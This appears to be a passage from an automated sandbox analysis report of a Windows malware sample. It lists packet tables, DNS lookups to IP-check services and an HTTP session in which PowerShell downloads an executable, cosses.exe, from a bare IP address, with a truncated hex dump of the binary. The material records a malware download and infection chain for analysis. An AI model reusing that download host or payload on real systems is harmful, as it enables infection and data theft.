Mar 17, 2025 01:19:00.179708958 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179730892 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179730892 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179759026 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179769993 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179784060 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179795027 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179805040 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179816008 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179826975 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179837942 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179848909 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179853916 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179853916 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179853916 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179853916 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179879904 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179909945 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179919004 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179932117 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179941893 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179960966 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179960966 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179974079 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.179975033 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179997921 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.179997921 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180011988 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180017948 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180031061 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180043936 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180049896 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180053949 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180067062 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180074930 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180080891 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180092096 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180103064 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180104017 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180124044 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180130959 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180136919 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180150032 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180151939 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180161953 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180174112 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180174112 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180195093 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180202961 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180207014 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180218935 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180223942 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180238962 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180243969 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180252075 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180263996 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180274010 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180282116 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180295944 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180303097 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180330038 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180334091 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180351019 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180363894 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180382967 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180388927 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180396080 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180409908 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180438042 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180450916 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180464983 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180484056 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180490017 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180496931 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180507898 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180521965 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180533886 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180550098 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180552006 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180566072 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180586100 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180593967 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180603981 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180609941 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180618048 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180625916 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180636883 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180648088 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180655956 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180684090 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180692911 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180704117 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180707932 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180716991 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180742979 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180763960 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180768013 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180775881 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180787086 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180816889 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180824041 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180829048 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180846930 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180866957 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180872917 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180881023 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180892944 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180898905 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180908918 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180913925 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180938959 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180951118 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180963993 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.180970907 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.180994987 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181005001 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181006908 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181016922 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181037903 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181047916 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181049109 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181060076 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181071043 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181077003 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181111097 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181227922 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181240082 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181250095 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181261063 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181272984 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181282997 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181283951 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181296110 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181304932 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181328058 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181355000 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181382895 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181395054 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181406021 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181416988 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181423903 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181430101 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181442022 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181442976 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181454897 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181467056 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181482077 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181499958 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181499958 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181524038 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181524992 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181535959 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181548119 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181550026 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181560040 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181569099 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181571960 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181581974 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.181622028 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.181622028 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:00.278870106 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:00.280751944 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:04.394156933 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:19:04.394259930 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:05.102061987 CET	49682	80	192.168.2.7	193.122.6.168
Mar 17, 2025 01:19:05.106719971 CET	80	49682	193.122.6.168	192.168.2.7
Mar 17, 2025 01:19:05.106820107 CET	49682	80	192.168.2.7	193.122.6.168
Mar 17, 2025 01:19:05.107141018 CET	49682	80	192.168.2.7	193.122.6.168
Mar 17, 2025 01:19:05.111773968 CET	80	49682	193.122.6.168	192.168.2.7
Mar 17, 2025 01:19:06.769285917 CET	80	49682	193.122.6.168	192.168.2.7
Mar 17, 2025 01:19:06.824657917 CET	49682	80	192.168.2.7	193.122.6.168
Mar 17, 2025 01:19:06.906786919 CET	49682	80	192.168.2.7	193.122.6.168
Mar 17, 2025 01:19:06.911519051 CET	80	49682	193.122.6.168	192.168.2.7
Mar 17, 2025 01:19:07.760237932 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:19:08.237730980 CET	80	49682	193.122.6.168	192.168.2.7
Mar 17, 2025 01:19:08.261439085 CET	49683	443	192.168.2.7	104.21.112.1
Mar 17, 2025 01:19:08.261512995 CET	443	49683	104.21.112.1	192.168.2.7
Mar 17, 2025 01:19:08.261594057 CET	49683	443	192.168.2.7	104.21.112.1
Mar 17, 2025 01:19:08.277479887 CET	49683	443	192.168.2.7	104.21.112.1
Mar 17, 2025 01:19:08.277496099 CET	443	49683	104.21.112.1	192.168.2.7
Mar 17, 2025 01:19:08.293432951 CET	49682	80	192.168.2.7	193.122.6.168
Mar 17, 2025 01:19:08.749737024 CET	443	49683	104.21.112.1	192.168.2.7
Mar 17, 2025 01:19:08.749816895 CET	49683	443	192.168.2.7	104.21.112.1
Mar 17, 2025 01:19:08.756169081 CET	49683	443	192.168.2.7	104.21.112.1
Mar 17, 2025 01:19:08.756182909 CET	443	49683	104.21.112.1	192.168.2.7
Mar 17, 2025 01:19:08.756525993 CET	443	49683	104.21.112.1	192.168.2.7
Mar 17, 2025 01:19:08.803472996 CET	49683	443	192.168.2.7	104.21.112.1
Mar 17, 2025 01:19:08.844322920 CET	443	49683	104.21.112.1	192.168.2.7
Mar 17, 2025 01:19:08.911900043 CET	443	49683	104.21.112.1	192.168.2.7
Mar 17, 2025 01:19:08.911988020 CET	443	49683	104.21.112.1	192.168.2.7
Mar 17, 2025 01:19:08.912043095 CET	49683	443	192.168.2.7	104.21.112.1
Mar 17, 2025 01:19:08.919094086 CET	49683	443	192.168.2.7	104.21.112.1
Mar 17, 2025 01:20:13.238378048 CET	80	49682	193.122.6.168	192.168.2.7
Mar 17, 2025 01:20:13.238465071 CET	49682	80	192.168.2.7	193.122.6.168
Mar 17, 2025 01:20:48.246834993 CET	49682	80	192.168.2.7	193.122.6.168
Mar 17, 2025 01:20:48.251612902 CET	80	49682	193.122.6.168	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2025 01:19:05.089955091 CET	55736	53	192.168.2.7	1.1.1.1
Mar 17, 2025 01:19:05.097234011 CET	53	55736	1.1.1.1	192.168.2.7
Mar 17, 2025 01:19:08.242170095 CET	62057	53	192.168.2.7	1.1.1.1
Mar 17, 2025 01:19:08.260220051 CET	53	62057	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 17, 2025 01:19:05.089955091 CET	192.168.2.7	1.1.1.1	0x2f72	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:08.242170095 CET	192.168.2.7	1.1.1.1	0xe7c0	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 17, 2025 01:19:05.097234011 CET	1.1.1.1	192.168.2.7	0x2f72	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 01:19:05.097234011 CET	1.1.1.1	192.168.2.7	0x2f72	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:05.097234011 CET	1.1.1.1	192.168.2.7	0x2f72	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:05.097234011 CET	1.1.1.1	192.168.2.7	0x2f72	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:05.097234011 CET	1.1.1.1	192.168.2.7	0x2f72	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:05.097234011 CET	1.1.1.1	192.168.2.7	0x2f72	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:08.260220051 CET	1.1.1.1	192.168.2.7	0xe7c0	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:08.260220051 CET	1.1.1.1	192.168.2.7	0xe7c0	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:08.260220051 CET	1.1.1.1	192.168.2.7	0xe7c0	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:08.260220051 CET	1.1.1.1	192.168.2.7	0xe7c0	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:08.260220051 CET	1.1.1.1	192.168.2.7	0xe7c0	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:08.260220051 CET	1.1.1.1	192.168.2.7	0xe7c0	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 01:19:08.260220051 CET	1.1.1.1	192.168.2.7	0xe7c0	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

198.12.89.24

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49681	198.12.89.24	80	7092	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Mar 17, 2025 01:18:58.904217958 CET	286	OUT	GET /346/cosses.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 198.12.89.24 Connection: Keep-Alive
Mar 17, 2025 01:18:59.385960102 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 00:18:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 13 Mar 2025 12:13:30 GMT ETag: "efc00-6303840057bc3" Accept-Ranges: bytes Content-Length: 982016 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c8 cb d2 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 1a 06 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELg"}@p@@@@L\|psq+pH@.text `.rdata@@.datatR@.rsrcspt@@.relocqr@B
Mar 17, 2025 01:18:59.385971069 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: DALhYC,YY9hcCY8hiCYhnCYM,hsCYhxCYQ
Mar 17, 2025 01:18:59.385982990 CET	1236	IN	Data Raw: 00 68 7d b5 43 00 e8 ca 1c 02 00 59 c3 a1 10 53 4c 00 51 8b 40 04 05 10 53 4c 00 50 e8 ff 5f 00 00 68 92 b5 43 00 e8 aa 1c 02 00 59 c3 e8 05 31 00 00 68 97 b5 43 00 e8 99 1c 02 00 59 c3 e8 e6 73 00 00 68 9c b5 43 00 e8 88 1c 02 00 59 c3 e8 67 4c Data Ascii: h}CYSLQ@SLP_hCY1hCYshCYgLhCwYdLehCaYSVWj[lGKyNlGN(GVY_^[SV3Wj_NN(^^~^^^ ^$ef^8
Mar 17, 2025 01:18:59.385993958 CET	224	IN	Data Raw: db 43 c7 45 fc fe ff ff ff 57 89 5d f0 ff 15 28 f1 48 00 8b 75 0c 88 1d 6c 58 4c 00 eb 6f ff 75 f0 33 db 53 ff 75 fc ff 75 f8 57 e8 84 fd ff ff 39 5e 0c 7e 34 8b ce 8d 86 10 08 00 00 8d 56 10 89 45 f4 f7 d9 89 55 0c 89 4d 08 80 38 08 73 53 83 c2 Data Ascii: CEW](HulXLou3SuuW9^~4VEUM8sS@EU;FE\|F;t+PPCPW$HvuuW_^[];t +QPCPW$HEUMt
Mar 17, 2025 01:18:59.386003017 CET	1236	IN	Data Raw: 44 80 f9 08 75 4c 8b 4d f8 83 f9 ff 74 0c ff 75 fc 57 e8 7a fd ff ff 8b 4d f8 8b 45 0c 83 38 ff 74 05 8b 08 89 4d f8 8b 40 04 83 f8 ff 74 1e 89 45 fc ff 75 f0 6a 00 50 51 57 e8 95 fc ff ff 8b 45 f4 8b 55 0c 8b 4d 08 e9 23 ff ff ff 8b 45 fc eb e0 Data Ascii: DuLMtuWzME8tM@tEujPQWEUM#EuMUuWLXLqPjujuH]UuWLMPPjjjuH]UQSVuWL!uWLVEM
Mar 17, 2025 01:18:59.386013031 CET	1236	IN	Data Raw: 8b c3 c1 e8 10 50 57 0f b7 c3 50 56 e8 97 fd ff ff e9 04 ff ff ff 49 74 0d 49 49 0f 85 e2 fe ff ff e9 03 9e 03 00 51 51 56 e8 77 ae 08 00 e9 e7 fe ff ff 6a 02 e9 7e fe ff ff 6a 01 e9 77 fe ff ff 51 e9 e3 9e 03 00 6a 01 e9 ab 9e 03 00 55 8b ec 56 Data Ascii: PWPVItIIQQVwj~jwQjUVW}Mt<ESt;u>^;u>VEYt[jj7XH_^]uMt9t6UM$uE(@
Mar 17, 2025 01:18:59.386023998 CET	1236	IN	Data Raw: 00 00 00 eb b6 66 8b 45 e0 66 89 87 8a 00 00 00 eb ae 55 8b ec a1 b4 57 4c 00 8b 4d 18 83 f8 01 0f 85 71 9c 03 00 8b 45 08 83 f8 ff 74 03 89 41 58 8b 45 0c 83 f8 ff 74 03 89 41 5c 8b 45 10 85 c0 7e 03 89 41 60 8b 45 14 85 c0 7e 03 89 41 64 5d c2 Data Ascii: fEfUWLMqEtAXEtA\E~A`E~Ad]UQXLVuWj8Wc4XLjZU;$XL0F;G{r:VW~dk~hs~
Mar 17, 2025 01:18:59.386075974 CET	1236	IN	Data Raw: 83 20 00 ff 8e 80 00 00 00 3b be 84 00 00 00 75 3f 83 ff 03 7c 16 8b 46 74 8d 0c b8 8b 01 83 38 00 75 09 4f 83 e9 04 83 ff 03 7d f0 89 be 84 00 00 00 eb 1c ff 4e 78 8b 4e 78 8b 46 74 ff 34 88 e8 4c e9 01 00 8b 46 74 59 8b 4e 78 83 24 88 00 83 7e Data Ascii: ;u?\|Ft8uO}NxNxFt4LFtYNx$~xvNxFtD8t_^]jUQ(XLVW90XLun=4XLhoY"E}P XL54XLF54XL$XL0XL9M
Mar 17, 2025 01:18:59.386360884 CET	328	IN	Data Raw: 0c 53 ff 75 08 68 c4 fa 48 00 ff 75 1c ff 15 20 f7 48 00 89 07 85 c0 0f 84 61 97 03 00 56 6a eb 50 ff 15 10 f5 48 00 8b 45 24 89 47 08 8b 45 0c 89 47 3c 8b 45 20 89 47 40 8d 45 e8 50 ff 37 ff 15 34 f6 48 00 8b 45 f0 2b 45 e8 89 47 44 8b 45 f4 2b Data Ascii: SuhHu HaVjPHE$GEG<E G@EP74HE+EGDE+EjjGHHPj07HjWWL\=WLuhV@j(jjHWLWLWLj5XLG_^[] 3"'MPMRU}
Mar 17, 2025 01:18:59.386372089 CET	1236	IN	Data Raw: ff 02 74 51 83 ff 03 74 43 7e 29 83 ff 05 7f 31 80 7e 38 00 75 56 57 51 ff 15 1c f7 48 00 83 ff 08 74 0d 83 ff 04 74 08 ff 75 0c e8 f0 1d 00 00 c6 46 38 01 33 c0 40 5e 5f 5d c2 08 00 33 c0 eb f7 83 ff 06 0f 84 0c 97 03 00 eb e8 c6 46 38 01 e9 6e Data Ascii: tQtC~)1~8uVWQHttuF83@^_]3F8nF8RQHF83U}eXLt/UBw$XLu\T3@]3UQQ}2XLtt}7XLVW}0E
Mar 17, 2025 01:18:59.392090082 CET	1236	IN	Data Raw: e8 82 f6 ff ff 89 46 6c eb dd 55 8b ec 51 51 8d 45 fc b9 b0 57 4c 00 50 8d 45 f8 50 ff 75 08 e8 53 f4 ff ff 84 c0 74 4b 8b 4d fc a1 24 58 4c 00 57 8b 04 88 8b 38 80 bf 90 00 00 00 1b 75 38 53 8b 5d 0c 8d 43 ff 83 f8 17 77 30 0f b6 80 29 30 40 00 Data Ascii: FlUQQEWLPEPuStKM$XLW8u8S]Cw0)0@$0@juuSW3@[_] 333I0@/@bCCCDC0@U@xRLV3XLjE0E+uEEu0HE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49682	193.122.6.168	80	416	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
